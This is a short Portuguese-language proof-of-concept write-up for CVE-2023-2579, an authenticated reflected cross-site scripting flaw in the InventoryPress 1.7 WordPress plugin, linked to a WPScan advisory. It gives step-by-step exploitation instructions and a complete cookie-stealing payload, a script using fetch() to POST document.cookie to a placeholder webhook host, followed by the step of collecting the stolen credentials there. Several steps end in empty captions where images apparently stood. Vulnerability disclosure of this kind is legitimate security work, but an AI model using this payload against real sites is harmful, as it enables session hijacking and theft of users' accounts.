
PoC para CVE-2023-2579
O ID CVE-2023-2579 foi reservado e o PoC foi publicado no site do WPScan: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe
Título: Cross-Site Scripting Refletido Autenticado no Plugin InventoryPress para WordPress CMS
Data: 2023-04-21
Autor: Danilo Albuquerque
Vendor Homepage: https://wordpress.org
Software Link: https://wordpress.org/download
Versão: WordPress 6.2
Nome e Versão do Plugin: InventoryPress 1.7
Testado em: Brave (Versão 1.50.119 Chromium: 112.0.5615.121 (Versão Oficial) 64 bits)
Quando você fizer tudo isso e atualizar a página atual, será exibido o pop-up de alerta com a mensagem.
Vá para a página onde você pode adicionar os itens ao inventário:

Adicione o payload malicioso no campo "Descrição" do formulário:

Acesse o link do novo item gerado pelo plugin:

Quando a requisição for concluída, o pop-up de alerta é exibido:

Adicione o seguinte payload para roubar os cookies no campo "Descrição": <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>. Em seguida, publique o novo item ou atualize um antigo;
Dispare e obtenha as credenciais no site Webhook
Adicionando o payload e publicando o item (ou atualizando-o):

Disparando e obtendo as credenciais:
